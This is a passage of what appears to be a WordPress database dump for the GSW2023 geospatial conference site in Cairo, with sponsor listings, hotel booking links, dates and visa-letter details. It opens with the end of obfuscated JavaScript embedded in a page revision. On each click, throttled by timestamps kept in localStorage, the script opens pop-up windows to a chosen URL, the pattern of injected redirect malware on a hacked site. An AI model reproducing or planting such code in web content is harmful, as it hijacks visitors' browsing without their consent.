_0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-09 22:07:34','2023-06-09 22:07:34','',3066,'https://gsw2023.com/?p=4668',0,'revision','',0),
(4669,1,'2023-06-09 22:08:00','2023-06-09 22:08:00','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a></p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686320769324{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>Invitation letter</strong></span></h2>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>You will receive an invitation letter automatically once you provide your Name (as it appears in your passport), PassportNumber ,Nationality and Your Organization .</strong></span></p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>If you require specific format for the Visa Letter, please Send email to </strong></span></p>\n<p style=\"text-align: center;\"><strong style=\"color: #ffffff;\"><span style=\"color: #ffff00;\"> <a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a></span> to edit/add the text of the letter.</strong></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fvisa.gsw2023.com%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686318545126{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Get Your Invitation letter[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" 